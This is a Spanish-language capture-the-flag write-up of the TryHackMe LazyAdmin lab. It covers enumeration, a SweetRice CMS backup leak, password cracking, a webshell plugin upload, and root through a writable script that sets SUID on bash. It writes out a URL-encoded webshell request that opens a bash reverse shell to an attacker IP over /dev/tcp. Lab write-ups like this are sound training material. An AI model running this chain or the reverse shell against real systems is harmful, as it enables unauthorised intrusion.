TryHackMe | LazyAdmin | Write up (#THM) by r1cky_r3x

 

LazyAdmin

Por

Rick Álvarez (aka r1cky_r3x)

Camino hacia el eJPTv2

Pre-Configuración TryHackMe

Nota: en ocasiones me sucede que estoy ejecutando cosas y la maquina se me queda colgada, entonces la termino y la vuelvo a iniciar con una nueva IP.

Reconocimiento

Ping, IP y SO: 

Enumeración

Quick Scan: 

Servicios y Versiones (Targetted Ports):

Tenemos 2 puertos:

Puerto 22:

Scripts nmap

Vulnerabilidades:

Puerto 80:

Scripts nmap

Vulnerabilidades:

Whatweb

Fuzzing

Como vemos, aun no terminaba y encontré un directorio, vamos a ver que tiene:

Tenemos un servicio, un tal "SweetRice"

Vamos a ver que es primeramente, por lo poco que veo parece un servicio CMS:

Link aquí.

Vulnerabilidades:

Vaya vaya!

Parece ser que si hay vulnerabilidades, intentaré jugar con algunos para ver si puedo utilizar un exploit de forma manual (es decir, sin metasploit o herramientas similares).

...

Explotación

Leyendo y jugando un poco, me encontré con este exploit, donde pude ingresar a un backup de la base de datos:

Aquí encontré un usuario y contraseña que pude crackear con crackstation:

 

y con ello pude ingresar al sitio:

Por cierto, hice fuzzing al sitio y así fue como encontré el panel de login:

Voy a seguir buscando cosas para ver si puedo comprometer el sistema, tal ves una revshell...

... 

Despues de indagar un rato, encontré este exploit en donde, a base de un plugin que se instala, es posible obtener una webshell en la plataforma.

Primero subi el plugin:

Posteriormente, damos en Install:

Ahora si, podemos ingresar al plugin "webshell" en el siguiente link:

http://10.201.122.51/content/_plugin/webshell/webshell.php?action=exec&cmd=id

Ingresamos:

Desde aquí nos podemos realizar una revshell con el siguiente comando:

http://10.201.122.51/content/_plugin/webshell/webshell.php?action=exec&cmd=bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/10.6.22.89/443%200%3E%261%22

OJO: aquí necesitas actualizar y colocar tu ip de maquina atacante, la mia era 10.6.22.89.

Iniciarnos nuestro netcat en la maquina atacante:

Ejecutamos en la maquina victima y...

Volvemos a nuestra maquina atacante:

Estamos dentro!

Post Explotación

Me doy cuenta que la TTY esta algo limitada, nos damos cuenta de eso por que primero, no podemos hacer arriba, abajo, izquierda, derecha, Ctrl + L, etc.
Y segundo por que si damos echo $SHELL nos da una /usr/bin/nologin:

Obteniendo una FULL TTY

Vamos a obtener una full tty, de la siguiente forma:

En nuestra maquina de kali:

Ajustamos stty cols and rows en maquina victima:

Ahora si, tenemos una TTY totalmente interactiva:

Usuarios:

Primer flag:

Permisos SUDO:

Podemos ejecutar sin contraseña el binario 

/usr/bin/perl /home/itguy/backup.pl

El archivo backup.pl contiene lo siguiente:

Vamos a ver si podemos escribir en el archivo /etc/copy.sh:

Para nuestra suerte, otros pueden escribir en el archivo /etc/copy.sh

Y ademas, el propietario es root.

Vamos a cambiar el contenido de /etc/copy.sh

Pues si se pudo! 

Y lo que hice aquí es cambiar el bit SUID al binario /bin/bash.

Y esto nos ayuda a que podamos usar la bash como el propietario con el siguiente comando:

Somos root!

Vamos por la ultima flag:

Y así ya tenemos nuestra maquina LazyAdmin marcada como Pwneada!